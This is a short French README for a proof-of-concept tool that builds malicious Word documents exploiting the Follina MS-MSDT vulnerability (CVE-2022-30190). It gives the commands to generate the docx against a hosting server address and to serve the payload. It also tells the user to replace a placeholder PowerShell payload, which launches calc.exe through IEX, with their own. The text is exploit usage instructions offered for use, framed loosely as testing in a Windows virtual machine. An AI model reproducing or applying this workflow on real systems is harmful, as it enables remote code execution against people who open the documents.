
Générateur de documents PoC MS-MSDT Follina CVE-2022-30190
Générateur de docx malveillant pour exploiter (exécution de code à distance Microsoft Office Word)
La création de ce script est basée sur le PoC CVE-2021-40444 par LockedByte et le write-up de Tothi
Modifiez d'abord backup.html et remplacez le payload PowerShell. Pour l'instant, il se contente d'ouvrir calc.exe via IEX('calc.exe').
python3 exploit.py generate http://<SRV IP>

Une fois que vous avez généré le docx malveillant (il se trouvera dans out/), vous pouvez mettre en place le serveur :
sudo python3 exploit.py host 80

Enfin, testez le docx dans une machine virtuelle Windows :
